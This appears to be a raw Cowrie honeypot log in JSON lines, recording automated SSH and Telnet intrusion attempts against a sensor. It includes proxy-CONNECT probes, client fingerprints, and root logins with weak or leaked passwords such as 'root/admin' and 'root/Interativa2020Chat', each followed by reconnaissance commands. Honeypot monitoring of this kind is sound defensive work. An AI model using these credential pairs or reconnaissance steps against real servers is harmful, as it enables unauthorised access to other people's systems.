{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":27790,"dst_ip":"1.2.3.4","dst_port":22,"session":"b147eb42bdd3","protocol":"ssh","message":"New connection: 212.227.125.160:27790 (1.2.3.4:22) [session: b147eb42bdd3]","sensor":"my-vps","timestamp":"2025-08-28T20:22:05.158129Z"}
{"eventid":"cowrie.client.version","version":"CONNECT 45.221.64.243:80 HTTP/1.0","message":"Remote SSH version: CONNECT 45.221.64.243:80 HTTP/1.0","sensor":"my-vps","timestamp":"2025-08-28T20:22:06.043404Z","src_ip":"212.227.125.160","session":"b147eb42bdd3"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:22:06.044803Z","src_ip":"212.227.125.160","session":"b147eb42bdd3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":27798,"dst_ip":"1.2.3.4","dst_port":22,"session":"305a3b6bbcaa","protocol":"ssh","message":"New connection: 212.227.125.160:27798 (1.2.3.4:22) [session: 305a3b6bbcaa]","sensor":"my-vps","timestamp":"2025-08-28T20:22:08.375345Z"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:22:09.387479Z","src_ip":"212.227.125.160","session":"305a3b6bbcaa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":13098,"dst_ip":"1.2.3.4","dst_port":22,"session":"1a50cd8e5470","protocol":"ssh","message":"New connection: 212.227.125.160:13098 (1.2.3.4:22) [session: 1a50cd8e5470]","sensor":"my-vps","timestamp":"2025-08-28T20:22:12.466133Z"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:22:13.609257Z","src_ip":"212.227.125.160","session":"1a50cd8e5470"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":13102,"dst_ip":"1.2.3.4","dst_port":22,"session":"8b15caa25856","protocol":"ssh","message":"New connection: 212.227.125.160:13102 (1.2.3.4:22) [session: 8b15caa25856]","sensor":"my-vps","timestamp":"2025-08-28T20:22:16.058232Z"}
{"eventid":"cowrie.client.version","version":"CONNECT 45.221.64.243:80 HTTP/1.0","message":"Remote SSH version: CONNECT 45.221.64.243:80 HTTP/1.0","sensor":"my-vps","timestamp":"2025-08-28T20:22:17.210868Z","src_ip":"212.227.125.160","session":"8b15caa25856"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:22:17.212116Z","src_ip":"212.227.125.160","session":"8b15caa25856"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38082,"dst_ip":"1.2.3.4","dst_port":22,"session":"9931f3250f3b","protocol":"ssh","message":"New connection: 212.227.125.160:38082 (1.2.3.4:22) [session: 9931f3250f3b]","sensor":"my-vps","timestamp":"2025-08-28T20:22:17.823952Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T20:22:18.934589Z","src_ip":"212.227.125.160","session":"9931f3250f3b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T20:22:18.935393Z","src_ip":"212.227.125.160","session":"9931f3250f3b"}
{"eventid":"cowrie.login.success","username":"root","password":"12345678","message":"login attempt [root/12345678] succeeded","sensor":"my-vps","timestamp":"2025-08-28T20:22:25.419713Z","src_ip":"212.227.125.160","session":"9931f3250f3b"}
{"eventid":"cowrie.login.success","username":"root","password":"zhuoyunzhi","message":"login attempt [root/zhuoyunzhi] succeeded","sensor":"my-vps","timestamp":"2025-08-28T20:22:27.378896Z","src_ip":"103.110.81.140","session":"3e406776329c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T20:22:27.395790Z","src_ip":"103.110.81.140","session":"3e406776329c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T20:22:28.219604Z","src_ip":"212.227.125.160","session":"9931f3250f3b"}
{"eventid":"cowrie.command.input","input":"uptime","message":"CMD: uptime","sensor":"my-vps","timestamp":"2025-08-28T20:22:28.220353Z","src_ip":"212.227.125.160","session":"9931f3250f3b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802","size":69,"shasum":"dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802","duplicate":true,"duration":"1.7","message":"Closing TTY Log: var/lib/cowrie/tty/dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802 after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:22:29.943993Z","src_ip":"212.227.125.160","session":"9931f3250f3b"}
{"eventid":"cowrie.session.closed","duration":"12.1","message":"Connection lost after 12.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:22:29.945190Z","src_ip":"212.227.125.160","session":"9931f3250f3b"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":52196,"dst_ip":"1.2.3.4","dst_port":22,"session":"96222b8d6327","protocol":"ssh","message":"New connection: 201.148.180.50:52196 (1.2.3.4:22) [session: 96222b8d6327]","sensor":"my-vps","timestamp":"2025-08-28T20:22:35.973891Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T20:22:36.754769Z","src_ip":"201.148.180.50","session":"96222b8d6327"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T20:22:36.755424Z","src_ip":"201.148.180.50","session":"96222b8d6327"}
{"eventid":"cowrie.login.success","username":"root","password":"12345678","message":"login attempt [root/12345678] succeeded","sensor":"my-vps","timestamp":"2025-08-28T20:22:43.455023Z","src_ip":"201.148.180.50","session":"96222b8d6327"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T20:22:47.058790Z","src_ip":"201.148.180.50","session":"96222b8d6327"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-28T20:22:47.059519Z","src_ip":"201.148.180.50","session":"96222b8d6327"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"1.5","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:22:48.569218Z","src_ip":"201.148.180.50","session":"96222b8d6327"}
{"eventid":"cowrie.session.closed","duration":"12.6","message":"Connection lost after 12.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:22:48.570399Z","src_ip":"201.148.180.50","session":"96222b8d6327"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:23:17.295635Z","src_ip":"212.227.125.160","session":"5901b34edea6"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:23:21.670181Z","src_ip":"212.227.125.160","session":"f72aa9cc9fab"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:23:52.050988Z","src_ip":"212.227.125.160","session":"f44a330acb5a"}
{"eventid":"cowrie.session.connect","src_ip":"114.25.98.27","src_port":47156,"dst_ip":"1.2.3.4","dst_port":23,"session":"63a7172229e4","protocol":"telnet","message":"New connection: 114.25.98.27:47156 (1.2.3.4:23) [session: 63a7172229e4]","sensor":"my-vps","timestamp":"2025-08-28T20:23:53.420184Z"}
{"eventid":"cowrie.session.connect","src_ip":"79.124.8.120","src_port":55346,"dst_ip":"1.2.3.4","dst_port":23,"session":"7ec6340fa0a0","protocol":"telnet","message":"New connection: 79.124.8.120:55346 (1.2.3.4:23) [session: 7ec6340fa0a0]","sensor":"my-vps","timestamp":"2025-08-28T20:23:58.567179Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T20:23:58.607332Z","src_ip":"79.124.8.120","session":"7ec6340fa0a0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T20:23:58.629383Z","src_ip":"79.124.8.120","session":"7ec6340fa0a0"}
{"eventid":"cowrie.session.closed","duration":12.701511859893799,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:24:06.121610Z","src_ip":"114.25.98.27","session":"63a7172229e4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57328,"dst_ip":"1.2.3.4","dst_port":23,"session":"7848adc7a3cb","protocol":"telnet","message":"New connection: 212.227.235.229:57328 (1.2.3.4:23) [session: 7848adc7a3cb]","sensor":"my-vps","timestamp":"2025-08-28T20:25:36.551278Z"}
{"eventid":"cowrie.session.closed","duration":31.270217418670654,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:26:07.821424Z","src_ip":"212.227.235.229","session":"7848adc7a3cb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51096,"dst_ip":"1.2.3.4","dst_port":22,"session":"cf99f8d5d23c","protocol":"ssh","message":"New connection: 212.227.235.229:51096 (1.2.3.4:22) [session: cf99f8d5d23c]","sensor":"my-vps","timestamp":"2025-08-28T20:26:45.735550Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:26:45.842264Z","src_ip":"212.227.235.229","session":"cf99f8d5d23c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59454,"dst_ip":"1.2.3.4","dst_port":23,"session":"da95090bcee4","protocol":"telnet","message":"New connection: 212.227.125.160:59454 (1.2.3.4:23) [session: da95090bcee4]","sensor":"my-vps","timestamp":"2025-08-28T20:26:51.407768Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T20:26:51.492425Z","src_ip":"212.227.125.160","session":"da95090bcee4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T20:26:51.510632Z","src_ip":"212.227.125.160","session":"da95090bcee4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:26:58.637239Z","src_ip":"79.124.8.120","session":"7ec6340fa0a0"}
{"eventid":"cowrie.session.closed","duration":180.07501077651978,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:26:58.642103Z","src_ip":"79.124.8.120","session":"7ec6340fa0a0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49754,"dst_ip":"1.2.3.4","dst_port":22,"session":"a48d0be8614e","protocol":"ssh","message":"New connection: 212.227.125.160:49754 (1.2.3.4:22) [session: a48d0be8614e]","sensor":"my-vps","timestamp":"2025-08-28T20:27:38.953300Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T20:27:38.954193Z","src_ip":"212.227.125.160","session":"a48d0be8614e"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T20:27:39.035573Z","src_ip":"212.227.125.160","session":"a48d0be8614e"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-28T20:27:39.442834Z","src_ip":"212.227.125.160","session":"a48d0be8614e"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:27:40.526007Z","src_ip":"212.227.125.160","session":"a48d0be8614e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43910,"dst_ip":"1.2.3.4","dst_port":22,"session":"a06ce6f3614e","protocol":"ssh","message":"New connection: 212.227.125.160:43910 (1.2.3.4:22) [session: a06ce6f3614e]","sensor":"my-vps","timestamp":"2025-08-28T20:28:42.110303Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T20:28:43.244947Z","src_ip":"212.227.125.160","session":"a06ce6f3614e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T20:28:43.245683Z","src_ip":"212.227.125.160","session":"a06ce6f3614e"}
{"eventid":"cowrie.login.success","username":"root","password":"Interativa2020Chat","message":"login attempt [root/Interativa2020Chat] succeeded","sensor":"my-vps","timestamp":"2025-08-28T20:28:49.928860Z","src_ip":"212.227.125.160","session":"a06ce6f3614e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T20:28:53.080412Z","src_ip":"212.227.125.160","session":"a06ce6f3614e"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-28T20:28:53.081182Z","src_ip":"212.227.125.160","session":"a06ce6f3614e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"1.9","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:28:54.941421Z","src_ip":"212.227.125.160","session":"a06ce6f3614e"}
{"eventid":"cowrie.session.closed","duration":"12.9","message":"Connection lost after 12.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:28:54.979788Z","src_ip":"212.227.125.160","session":"a06ce6f3614e"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":63674,"dst_ip":"1.2.3.4","dst_port":22,"session":"c50e5b4679ce","protocol":"ssh","message":"New connection: 217.72.205.35:63674 (1.2.3.4:22) [session: c50e5b4679ce]","sensor":"my-vps","timestamp":"2025-08-28T20:28:55.961799Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:28:55.963045Z","src_ip":"217.72.205.35","session":"c50e5b4679ce"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":38248,"dst_ip":"1.2.3.4","dst_port":22,"session":"e473312b31e0","protocol":"ssh","message":"New connection: 201.148.180.50:38248 (1.2.3.4:22) [session: e473312b31e0]","sensor":"my-vps","timestamp":"2025-08-28T20:29:02.393593Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T20:29:03.563400Z","src_ip":"201.148.180.50","session":"e473312b31e0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T20:29:03.564638Z","src_ip":"201.148.180.50","session":"e473312b31e0"}
{"eventid":"cowrie.login.success","username":"root","password":"Interativa2020Chat","message":"login attempt [root/Interativa2020Chat] succeeded","sensor":"my-vps","timestamp":"2025-08-28T20:29:09.132028Z","src_ip":"201.148.180.50","session":"e473312b31e0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43618,"dst_ip":"1.2.3.4","dst_port":23,"session":"af9677bc12ec","protocol":"telnet","message":"New connection: 212.227.125.160:43618 (1.2.3.4:23) [session: af9677bc12ec]","sensor":"my-vps","timestamp":"2025-08-28T20:29:10.683191Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T20:29:11.710076Z","src_ip":"201.148.180.50","session":"e473312b31e0"}
{"eventid":"cowrie.command.input","input":"mount | head -5","message":"CMD: mount | head -5","sensor":"my-vps","timestamp":"2025-08-28T20:29:11.711224Z","src_ip":"201.148.180.50","session":"e473312b31e0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","size":28,"shasum":"eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","duplicate":true,"duration":"1.4","message":"Closing TTY Log: var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410 after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:29:13.117293Z","src_ip":"201.148.180.50","session":"e473312b31e0"}
{"eventid":"cowrie.session.closed","duration":"10.7","message":"Connection lost after 10.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:29:13.118477Z","src_ip":"201.148.180.50","session":"e473312b31e0"}
{"eventid":"cowrie.session.closed","duration":12.910279512405396,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:29:23.593403Z","src_ip":"212.227.125.160","session":"af9677bc12ec"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:29:51.522088Z","src_ip":"212.227.125.160","session":"da95090bcee4"}
{"eventid":"cowrie.session.closed","duration":180.11782050132751,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:29:51.525514Z","src_ip":"212.227.125.160","session":"da95090bcee4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56382,"dst_ip":"1.2.3.4","dst_port":23,"session":"b3714703eda1","protocol":"telnet","message":"New connection: 212.227.125.160:56382 (1.2.3.4:23) [session: b3714703eda1]","sensor":"my-vps","timestamp":"2025-08-28T20:30:52.964416Z"}
{"eventid":"cowrie.session.closed","duration":13.887460708618164,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:31:06.851785Z","src_ip":"212.227.125.160","session":"b3714703eda1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37353,"dst_ip":"1.2.3.4","dst_port":22,"session":"bfd5525e04f1","protocol":"ssh","message":"New connection: 212.227.125.160:37353 (1.2.3.4:22) [session: bfd5525e04f1]","sensor":"my-vps","timestamp":"2025-08-28T20:31:09.438643Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:31:09.439805Z","src_ip":"212.227.125.160","session":"bfd5525e04f1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37628,"dst_ip":"1.2.3.4","dst_port":22,"session":"2e3e59a22d73","protocol":"ssh","message":"New connection: 212.227.125.160:37628 (1.2.3.4:22) [session: 2e3e59a22d73]","sensor":"my-vps","timestamp":"2025-08-28T20:31:09.553001Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T20:31:09.553741Z","src_ip":"212.227.125.160","session":"2e3e59a22d73"}
